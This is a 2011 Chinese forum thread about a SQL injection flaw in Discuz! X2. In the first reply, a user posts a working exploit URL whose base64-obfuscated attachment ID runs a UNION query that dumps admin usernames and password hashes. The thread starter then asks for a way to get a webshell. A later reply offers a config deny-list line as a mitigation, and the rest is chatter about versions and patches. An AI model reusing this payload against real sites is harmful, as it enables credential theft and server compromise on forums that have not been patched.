找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
楼主: adnim

Discuz! X2 SQL注射漏洞

[复制链接]

25

主题

339

回帖

803

积分

高级会员

积分
803
发表于 2011-6-29 14:17:37 | 显示全部楼层
http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D

默認前墜之下爆出管理員帳號密碼。
回复

使用道具 举报

24

主题

108

回帖

306

积分

中级会员

积分
306
 楼主| 发表于 2011-6-29 14:23:04 | 显示全部楼层
求getwebshell
回复

使用道具 举报

139

主题

3439

回帖

7341

积分

论坛元老

积分
7341
发表于 2011-6-29 14:23:29 | 显示全部楼层
新版本我向来不用,不稳定,没经历风雨。我用7.2
回复

使用道具 举报

164

主题

918

回帖

2376

积分

金牌会员

积分
2376
发表于 2011-6-29 14:27:44 | 显示全部楼层
原帖由 vvx.cc 於 2011-6-29 14:55 發表


新版本我向來不用,不穩定,沒經歷風雨。我用7.2
7.2有xxs漏洞額..
回复

使用道具 举报

25

主题

339

回帖

803

积分

高级会员

积分
803
发表于 2011-6-29 14:53:48 | 显示全部楼层
config/config_global.php 文件中查找代码
$_config['security']['querysafe']['daction']['3'] = '(select';
在下面新增一行代码
$_config['security']['querysafe']['daction'][] = 'unionall';
回复

使用道具 举报

79

主题

1306

回帖

2893

积分

金牌会员

积分
2893
发表于 2011-6-29 14:55:13 | 显示全部楼层
回复

使用道具 举报

35

主题

637

回帖

1435

积分

金牌会员

积分
1435
发表于 2011-6-29 14:57:14 | 显示全部楼层
真伤不起啊,又爆洞洞给解释下是啥子意思?
回复

使用道具 举报

0

主题

2

回帖

6

积分

新手上路

积分
6
发表于 2011-6-29 16:06:04 | 显示全部楼层
补丁出来了...
回复

使用道具 举报

169

主题

2495

回帖

5537

积分

论坛元老

积分
5537
发表于 2011-6-29 16:13:51 | 显示全部楼层
官方升级了?
回复

使用道具 举报

113

主题

1万

回帖

2万

积分

论坛元老

积分
21249
发表于 2011-6-29 16:22:51 | 显示全部楼层
都是些临时工写的代码。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2025-1-11 20:45 , Processed in 0.032631 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表